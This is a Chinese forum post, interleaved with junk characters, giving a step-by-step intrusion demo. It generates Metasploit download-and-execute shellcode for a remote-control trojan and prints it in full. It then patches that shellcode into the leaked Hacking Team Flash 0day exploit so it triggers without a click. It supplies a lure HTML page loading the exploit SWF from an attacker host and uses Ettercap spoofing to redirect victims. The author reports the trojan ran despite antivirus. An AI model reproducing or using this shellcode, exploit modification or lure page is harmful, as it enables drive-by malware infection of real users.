|
) i( s8 z2 J- f: f7 F1 S! q 三、flash 0day之手工代码修改制作下载者实例入侵演示
+ h/ v; f0 d0 j4 C' ]; W# G
5 }0 D; |1 K: w& y3 M p$ b) R: D! o9 t% E
利用到的工具:
8 ?( a3 m- B& {1 J' s/ Y7 f/ b8 h2 R ( F. ?8 t, s; \& a3 ?9 Z
w. o5 W9 ]3 r6 |2 m
Msf 2 X9 D* ` ^, [* ]7 x
8 U( b9 \+ Y- b5 F5 \
% j1 v4 \# G1 ~5 \* U$ @! ~ Ettercap " f# l0 S0 R3 z- {; I
$ h9 z$ H2 P' Z: m c; t! G- I' S4 a7 h! ]. O% `, ]1 L
Adobe Flash CS6 ! [( @0 E; q; k) g
" X) e5 t+ K( l9 s* o
% E4 N7 q8 S1 w$ J5 ~$ V Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 : n6 I# k% g1 P7 ~! a; }2 [
. l3 [# Z9 O% \9 T2 A5 X% Y
- r( V! L% _/ P, N6 [" B) \
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
5 y( [$ ]; h$ c) K. \% ^' G" w # R4 |/ Y; ? z$ P Y$ ^6 c
2 G }* I% S" G0 z5 X a" c3 @ 如图:
' ]- O$ C0 ~0 Y: ? ! b) p; v% a5 Z/ W" q+ a. }* K
( ^- a: z. L+ k( j $ J: N. |) ?6 k- z; l; G3 P8 ^% X
$ G6 F7 k* @$ w$ @4 s) c2 F, [, K2 M
: G' ?, \ d. C- b  % U0 y! j1 S( h7 U0 d) I/ F0 O
' @; F O: z1 N) {4 Y h8 h: H* d; n, @; c/ Q5 z3 u1 ~2 b
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ) u, v% s% S. c! y: x: i T
$ C; {9 T! Z) ^7 N2 P
: m/ J5 ^+ ?* e3 B- Z2 F5 J
2 T% g V8 b9 [ r# h9 f
; G' Z* T) x& j$ `- p* c3 @! a. d3 g5 h* f/ f# r) l+ |, S
: r/ {3 r3 {4 m; Z7 I+ T+ i ; I* v5 \5 ^ t' m% S8 S. K; q
4 G. H( H' q! H 然后执行generate -t dword生成shellcode,如下:
, j' \7 k7 ?5 J8 T
$ O3 C$ D3 X5 P" B# q4 H
2 \: A! o5 c0 K 
- i3 f' P! l/ D $ ?* Y8 P7 ] K3 H
9 A1 D+ L6 ]( P% D y 复制代码到文本下便于我们一会编辑flash exp,如下: 7 Y. ]: p* a) ^$ A; |3 p
! F+ [6 _9 {+ G F& ?
0 l' j% E) Z1 ]2 }& L- A0 X2 R8 N 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
# |4 c, R6 J2 R5 b7 |& {5 o' ? 2 B" ^& K7 A4 l+ _& [
; B- P7 o8 K) x b 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
2 r, }' F O# J
+ o$ i4 ]5 Z' T j F9 N' f3 M& m& c; X1 \) B& m" L0 K4 g3 o H! D# c
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 5 l+ u! f# ~1 A+ h
5 D! N5 @; w+ x6 h9 x8 H. x% P$ o1 j- X1 R: K
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
! d$ q8 Y" @! H! M
3 F2 l+ f8 g1 v5 s1 Q: C9 e) L9 e) _/ p! l' U
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ( m% W7 q. x* `% N$ t6 X
1 }% z' e* e! ]! l' f5 }" c% T& H9 i% m& R
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, ) Z2 s Z7 }( W+ I5 f
9 T/ j( ~. L' `4 r& y
* K( l7 \, L" d 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
$ D' B* Y2 ]: g C 5 }5 [: w. [& S" {, t
p' s8 g, j- K" R- P 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, $ Z5 d# v# C/ W
C6 A/ q- J, {+ E: y
5 m1 n' v5 ?. v8 a5 ?
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
T& V. P# f9 {
' ~4 v8 Y8 p* K3 l% I" |5 J2 Q) m$ a0 ~
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
7 K y; R1 R' P9 j' z9 M : f/ U& w N, L0 q* P
+ N! G1 K! ]% q( M+ f
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, ( Q5 L- G* @5 J( [8 F$ [0 s# W
) S4 u' k2 x4 J+ X+ f1 A5 B! ]
6 O/ k0 k X& m7 }- K0 `4 _
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
9 ^5 k* g6 N `7 ~2 ]0 J, O }# Q % s$ `% s ^ j4 N3 m# O
& ~* D0 `' Q% S7 F( O* q
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, * M; s; P4 h9 P1 r5 e7 ~
4 D7 w+ n0 M) d- a5 q% P: N% k8 x g- X; ]* X+ w$ w, F. o! ]
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
. }3 i9 g& T7 P' ~/ `1 V$ } ; v# z" f2 h R0 P6 l5 S2 R4 q
, c$ J% Q |1 Q- e* x7 [( d
& w& Z' x2 e5 L' Y. @2 |
( B: G2 z5 {9 l5 K
) ^! e3 P' O% f: y) H E4 O- d3 f$ z( R
% w& C( B' K, [; M
( V, j1 @, D* y6 U
1 q5 a) p6 Q; X& @0 i/ M 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
: m q5 u; l5 ]/ \! f 9 y% \6 z% e* m/ J; ]1 T
9 r# R, w( C$ g, k, g1 }$ Q+ Y0 P1 }' O  ) V- x" G5 o% W$ l- W3 b
+ q/ b; A# w$ O( L' `: ^1 @5 Q7 }1 I' x
先修改ShellWin32.as,部分源代码如图: 1 l% I. Z+ m9 n$ J" I5 y' r
. E6 S! D7 n7 X) Q. C+ l8 [- ^$ F8 c: c) P0 D
/ Q- ~: S% a6 L
- Y! Y0 Q( W" x6 q; g
: ^9 P! }6 s- ?* T- H ]3 x6 G 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
& s: k# J# Q& m$ H2 C
' s5 M+ D4 \( Z3 x* v$ o G! {0 l! }2 |0 A
 , Q/ t8 p) L9 G" |4 E% D
. y3 `/ @1 y$ ^. Y$ Z0 q
+ Z1 h& F5 z9 q 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
( o7 E7 \& b+ G+ N+ P/ _
9 I. M3 J3 P. F& J* b2 W3 |) Z
$ A# W3 \% [" P8 E7 T2 H5 P 
; [+ d% L s g, n- e * B# D0 L3 j0 Z1 _! o' f; h
6 e, L9 f$ h) m% @6 _ 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
2 X: c- G- t$ U: g3 V5 K% ?& L
/ _" @4 G4 {$ ^9 L3 d6 ^# \! ~. g7 |' E( ~- O
* w1 m+ p1 P! c" G* X
/ i: Y: c. q* E2 l
9 q" S/ v/ L0 I6 o& \1 G
3 F: F: ?7 I5 I; v- p $ |4 g4 Y( f+ a
7 v# R5 h2 H$ |! [9 E3 r 
' |, b6 g* b9 ]: I. s 9 n7 p1 ]- @( M! W+ {4 m
) h) }4 C; V5 I
然后点保存,下面我们来编译一下,打开
: F$ {0 {$ P6 f0 E% R& f
' w: ^$ z, z, K3 o" @+ e; Q6 {
" X3 s. A! U6 n) I( w w% c1 s exp1.fla然后点文件-发布,看看编译没错误 8 l2 ]# S* D4 r! N; N8 @* S' R. u
2 ]$ b( ~& J! h4 \( f1 ~; b5 z' K. [: X
4 g# s0 I; m4 B( p8 J
& k9 p# H' k! J, J$ z3 Z
( \2 U/ M: R1 Z5 @1 L. g
) m% v, k# V& g: N% A
$ i! G7 z: M' D/ c& ^$ [; M9 n
3 e& r1 x3 Y2 e
6 Z p1 V% Q& }
F( x U% e. w' ?+ B8 p6 k
: Z/ b9 L9 h* Q: K  ! Q- Z, u0 Q7 k4 E7 |
- @6 h$ X" N: j. Z
4 y) X- V* H4 {5 v' `* D7 }: e, l3 e 然后我们把生成的
0 \" E$ i Q) V) n: ~, l# j/ t( o ; l) b' s0 ]/ e# b6 }
6 w6 {8 m2 |- p ~4 q B exp1.swf丢到kailinux 的/var/www/html下:
- |* D9 q+ h3 Z5 E0 \ 5 X8 y: N O. i; X, M" `) g9 P
* Q D8 d! t" m$ a 然后把这段代码好好编辑一下
! u/ B: S' F8 k% Z3 a3 A7 `" V, N " v- L* o7 Y: O: ]
6 W, G6 j, I0 S5 g8 L+ s# {7 k & g+ L- }) o6 P$ a. L) O
$ l$ `4 I, w& R
8 C L P3 Q! C7 g1 |1 }+ F
* U, I, U3 r1 S
7 {( y7 D. x( f1 b8 D( T
, g: e5 U, `% I
3 Z0 a( R, k2 h8 e7 Q$ q6 t8 Z
% I' Z, z: k2 [/ b' P; T0 K% @" _5 w3 W! ^- ^
5 X/ c! ~: ?6 {
; v: E: ~+ b) z) I& i+ X }5 X$ a* @+ C- m+ ]
' m+ ?! d$ Y6 {( A$ R 9 h1 c$ a1 j3 L; _6 t9 \% f
`6 B v: s6 o* F9 z. t 6 r4 o( ~/ B+ d- h: q. S; c1 F
R0 A7 }! ^. {1 U% F& v* [+ \/ e* T7 b: Y. p8 a$ h
<!DOCTYPE html>
) L/ [; N' B8 Q S3 ] ' j- D( \$ R' D/ M# }
2 V x) W2 x2 P# L <html> ) ~4 g: ^# V N, s) n
! P# p1 w/ u8 ~3 X) N# \
/ ]8 b& B: F, G <head>
% k6 m2 ]8 v2 J2 d% Q
4 Q. g( P' `" ]2 b) W% v! Q
) Z/ r3 _- {& l" L' y7 {$ Y <meta http-equiv="Content-Type" content="text/html;
, O1 k4 x( F. Z
7 K4 P4 l( i& d
1 y: P4 ?6 T9 o charset=utf-8"/>
3 [8 G b4 [$ f9 o8 w) Z) c5 n) o 4 U4 l( K! ]5 R X
6 K/ ~* t O2 t M
</head>
. V$ M0 G6 N5 J y0 x. O 4 ~3 C6 c( U# C/ A) N7 e
: A& m5 }% M. E <body> ' o& A, x1 Q6 e1 B- f$ H
0 X5 a* [2 ]& {
7 Z/ [) R0 [2 \- d! y
<h2> Please wait, the requested page is loading...</h2>
& N. E; f0 q0 f& P, J; `4 \) o
9 J: a7 v9 X" T2 G
, N6 D- G1 ~2 g- M <br> 2 N% G3 } [3 `; p+ }
0 O' \" r$ V2 {8 R# d1 I: _! K! v1 ]2 z+ m1 `/ t
<OBJECT % i9 w" w; L/ A
! N7 u7 i1 D2 d3 c; s" V! V% L9 V0 u- r1 u
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
: y" p* W/ v8 l% b5 H1 j. r 4 y/ g, I3 {" I5 \/ T1 f
( x, X7 j. D0 F: n" M$ n VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ( [( \& @% A' I& C: c
% n( g. R% _; ?- D& [6 b* X
2 m. [5 z7 ]0 Q1 M </body> # T1 T! z, a# T& Y3 v9 N1 m
' j' {5 p' e1 h/ g
8 g2 Y. V! r/ L, T <script> : ~& m0 X+ C* c( l2 b i/ o: X
; r0 p& @7 y: S S9 h1 u
2 r) O) p' e4 D0 l! C" \5 `8 A8 ]
setTimeout(function () { , N% x! Y$ m9 u5 P6 K
! U( q- J. F- S2 S% Q# M, |0 J! {8 x0 f4 b" P8 d2 D
% N \9 G# w( I0 E g! P
. B0 W9 z d0 n" t
. G3 l7 e$ {% E! W m3 x
window.location.reload(); ) R0 W3 n* c( o
$ d8 z$ r" [ l* D# _! U- k, {
/ e+ E6 i; {( Z; z" }- g }, 10000);
7 p1 B$ W0 U% Z! _8 g
- T- O3 L0 X l W2 [
6 h/ j! n9 t+ t: U
! m3 w) h* z" r' J; _9 p 0 G7 ^2 M9 a- s$ M+ T* @% `
7 n$ I( H, {. m, |0 c/ e* q* K </script> 8 \" F# C9 c% q, D! h
9 s7 l& c& [5 ]4 O- f% a
) O8 d! `8 X5 _ </html> m3 A( h% }+ f b+ i
7 Q1 i: r5 n, s2 O1 o4 ^' C
9 n! u$ C" G0 a1 K: X& I
3 [2 L! i4 ~1 q( J* f
( a# [$ a! y% @8 z
7 W6 F9 ~% A i 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: , V3 S" N! k1 z* ?' Q: N! C" ^9 s* V6 D
6 L2 I7 }$ Z ?0 l- q
8 c9 B6 v8 X! o6 K  * l. Z; a+ F; s+ W& E$ C, q9 a
3 b4 L- L3 y* O; A6 Y5 b9 v
3 d7 @; j7 d# w6 A% d9 p6 u
8 n w a2 s9 x' N6 O" L
3 E7 M9 O8 D! r w2 w6 {. O( ?$ s
6 h8 m5 j, F/ M& U$ h5 m
1 _! z+ B0 g4 [1 L- K' H9 d " \ G& N' g, S
5 k% U5 F9 i8 l
: t2 m5 ~ L \! W* @ 1 H" m% l0 d/ k, i% h$ z
$ Y4 h0 N+ l8 ^8 e8 u4 X N2 s 6 U }* p9 X0 ?; J/ y) u4 b
% Q5 B# w k. f8 ^' d6 d# S$ k
+ \* l5 k: T& E
下面我们用ettercap欺骗如图:
) b) E$ U3 a/ X/ {# O& U$ W
* x4 M3 j1 |3 U$ G3 n1 ]0 E/ _( ]9 l J9 F6 w
: I& A8 }5 {% e9 t4 Z u' b# v
6 ~7 p- U1 i) l" V
2 v% h6 X& I4 ~& x3 K) M' R
, m3 t5 v& x! L ; a8 U _( Y, }) W
) Z' Y/ G# t5 }: w+ m, `5 e 下面我们随便访问个网站看看: & H; r& m0 v/ p0 X$ a# i& {( \
8 [2 H9 ?: \# Z3 f
9 j6 v: F; H( q z$ z( l# d5 K2 T U 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: * A6 K$ E2 g0 u. ]0 F
+ | W( ?1 E; L4 L. G
$ }" A4 _# @# p3 m+ T
5 I# k) U$ n$ e- E0 C* C* `- ]7 U 1 R- K+ U. ]6 _' b
5 R0 B$ z u) ~# d* ~ 我们看另一台,
' p) G' \: Y, ~8 M ' r% \: h; P1 r' [
$ J8 X- J( ^4 H3 ]% z8 n2 r5 A 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
5 a' E7 k7 T( z) I6 H0 p( ?: T( } | 
发表于 2018-10-20 20:28:55
收藏
支持
反对